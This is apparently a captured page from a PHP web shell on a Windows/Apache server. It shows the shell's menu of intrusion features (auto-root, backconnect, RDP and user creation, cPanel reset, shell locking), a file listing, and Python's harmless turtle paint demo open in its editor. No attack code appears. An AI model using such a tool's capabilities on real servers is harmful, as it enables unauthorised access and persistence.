Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
python /
python-3.10 /
Lib /
turtledemo /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxrwxrwx
__init__.py
328
B
-rw-rw-rw-
__main__.py
15.09
KB
-rw-rw-rw-
bytedesign.py
4.31
KB
-rw-rw-rw-
chaos.py
1010
B
-rw-rw-rw-
clock.py
3.25
KB
-rw-rw-rw-
colormixer.py
1.36
KB
-rw-rw-rw-
forest.py
3
KB
-rw-rw-rw-
fractalcurves.py
3.53
KB
-rw-rw-rw-
lindenmayer.py
2.49
KB
-rw-rw-rw-
minimal_hanoi.py
2.08
KB
-rw-rw-rw-
nim.py
6.58
KB
-rw-rw-rw-
paint.py
1.31
KB
-rw-rw-rw-
peace.py
1.1
KB
-rw-rw-rw-
penrose.py
3.47
KB
-rw-rw-rw-
planet_and_moon.py
2.87
KB
-rw-rw-rw-
rosette.py
1.39
KB
-rw-rw-rw-
round_dance.py
1.85
KB
-rw-rw-rw-
sorting_animate.py
5.13
KB
-rw-rw-rw-
tree.py
1.43
KB
-rw-rw-rw-
turtle.cfg
170
B
-rw-rw-rw-
two_canvases.py
1.15
KB
-rw-rw-rw-
yinyang.py
870
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : paint.py
#!/usr/bin/env python3 """ turtle-example-suite: tdemo_paint.py A simple event-driven paint program - left mouse button moves turtle - middle mouse button changes color - right mouse button toggles between pen up (no line drawn when the turtle moves) and pen down (line is drawn). If pen up follows at least two pen-down moves, the polygon that includes the starting point is filled. ------------------------------------------- Play around by clicking into the canvas using all three mouse buttons. ------------------------------------------- To exit press STOP button ------------------------------------------- """ from turtle import * def switchupdown(x=0, y=0): if pen()["pendown"]: end_fill() up() else: down() begin_fill() def changecolor(x=0, y=0): global colors colors = colors[1:]+colors[:1] color(colors[0]) def main(): global colors shape("circle") resizemode("user") shapesize(.5) width(3) colors=["red", "green", "blue", "yellow"] color(colors[0]) switchupdown() onscreenclick(goto,1) onscreenclick(changecolor,2) onscreenclick(switchupdown,3) return "EVENTLOOP" if __name__ == "__main__": msg = main() print(msg) mainloop()
Close